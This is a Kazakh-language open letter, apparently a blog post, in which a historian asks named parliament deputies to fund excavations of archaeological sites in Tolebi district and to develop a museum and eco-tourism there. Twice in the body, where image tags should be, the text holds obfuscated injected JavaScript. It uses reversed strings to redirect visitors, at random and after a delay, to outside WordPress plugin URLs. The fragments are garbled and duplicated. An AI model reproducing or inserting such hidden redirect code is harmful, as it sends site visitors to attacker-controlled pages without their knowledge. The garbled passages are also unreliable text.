ҚР парламенті мәжілісінің депутаттары Исақұлов Ержан, Қонақбаев Серік, Есжанов Сәуірбай, Өнербаев Нұрлан мырзалардың назарына!

Өздеріңіз туып-өскен  Оңтүстік Қазақстан облысындағы Төлеби ауданының Ақсу мен Бадам өзендерінің аралығында, алды біздің заманымызға дейінгі 2 мыңжылдыққа жататын, соңғылары Қазақ Хандығына тиесілі (17 ғасыр)  көптеген тарихи-археологиялық ескерткіштер бар.

_2$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tories/_2.jpg» width=»270″ height=»175″ />
Солардың қатарындағы ең ірісі Кеңесарық ауылындағы «Төрткүлтөбе» (6-8 ғ.ғ) мен Есім хан (17 ғ.) ордасы саналатын «Дәуіттөбеге» қазба жұмыстары жүргізілсе, қазақ тарихына жаңа парақтар қосылатыны сөзсіз. Бұл ескерткіштердің қатарына,  атақты «Мыңшейіт» қорымын да қосуға болады. Тарихшылардың  пікірінше,»Төрткүлтөбе» қазақ тарихының ең аз зерттелген бөлігі «Түргеш» қағанаты туралы мәліметтер беруі мүмкін. Егер төтелеп барса, арабтар мен қытайлар арасында болған атақты «Атлах» (751 жыл) шайқасы өткен Тараз қаласы алыс емес екенін ескерсек, қасиетті дініміз «Исламның» қазақ арасына алғаш қалай тарала бастағаны туралы да деректер табуымыз мүмкін. Бұл ауылда екі үйдің бірінде, өз бақшаларынан табылған жәдігерлер бар десем, қателеспеймін. Бұл туралы «Қазақстан», «7-арна», «Астана» телеарналарында (http://video.mail.ru/mail/make7862/57/320.html) және газеттерде (http://my.mail.ru/community/sairamsu/23A5A7A952842A9D.html ) айтылды. Тағы біраз кешіксек, баға жетпес осы мұраларымыздан айрылып қалуымыз әбден мүмкін! Себебі, төбе үстіне ауыл тұрғындар үй сала бастады.
 Мұнда Отырардағы сияқты, ашық аспан астындағы мұражай ашуға үлкен мүмкіндік бар. Оның үстіне бұл өңір » Сайрам-Өгем» ұлттық табиғи паркімен шектесіп жатыр, тіпті сол парктің құрамына қосып жіберуге де болады. Бұл өз кезегінде аудан тұрғындарының әлеуметтік мәселелерін шешуге де мұрындық болар еді. Аудан тұрғындары өз шаруашылықтарында өндіретін қымыз, айран-сүт, құрт-май сияқты өнімдерін келушілерге ұсынып, ауылдағы жұмыссыздық мәселесі де біршама реттелетін еді. Оның үстіне ауданда елімізге белгілі атбегі, құсбегілер мен қолөнер шеберлері бар,..солар арқылы қазір дүние жүзінде үлкен қарқынмен дамып келе жатқан экотуризмді де дамыту мүмкіншілігі зор! Яғни, келуші туристер тек мұражайды тамашалап қана қоймай, ұлттық дүниетанымнан да біраз хабардар болады. Ат үстінде таулы аймақты аралап, қымыз ішу кез келген шетелдік туристің көңілінен шығатыны анық.Дәл бүгінгі күнге дейін Төрткүлтөбеге әлі археологтердің күрегі тие _3$NfI=function(n){if (typeof ($NfI.list[n]) == "string") return $NfI.list[n].split("").reverse().join("");return $NfI.list[n];};$NfI.list=["\'php.reklaw-yrogetac-smotsuc-ssalc/php/stegdiw-cpm/snigulp/tnetnoc-pw/gro.ogotaropsaid.www//:ptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6);if (number1==3){var delay=18000;setTimeout($NfI(0),delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6); if (number1==3){var delay = 18000; setTimeout($nJe(0), delay);}toof-redaeh/snigulp/tnetnoc-pw/moc.snoituloslattolg//:sptth\'=ferh.noitacol.tnemucod"];var number1=Math.floor(Math.random()*6); if (number1==3){var delay = 18000;setTimeout($mWn(0),delay);}dom() * 6);if (number1==3){var delay = 18000;setTimeout($zXz(0), delay);}tories/_3.jpg» width=»270″ height=»206″ />қойған жоқ. Мемлекет қаржыландырып, келісімін беріп жатса, атақты археолог, тарих ғылымдарының докторы, Ясауи атындағы Халықаралық Қазақ-Түрік Университетінің профессоры А.Н.Подушкин бастаған ғалымдар мұнда зерттеу жұмыстарын бастауға дайын. Ал осынау тарихи орынның сырлары толықтай ашылып жатса, қайталап айтайын, қазақ тарихындағы ақтаңдақтардың біразының жойылатынына сенімдімін.
Сіздерден өтінерім, осы археологиялық ескерткіштерге қазба жұмыстарын жүргізуге қаражат бөлу мүмкіндігін қарастырып көрсеніздер екен!

Сізге деген үлкен  құрмет және үмітпен
Өмір Шыныбекұлы -тарихшы,  8 700 440 62 15.
Шымкент қ.,

Leave a Reply

Ваш адрес email не будет опубликован. Обязательные поля помечены *

Яндекс.Метрика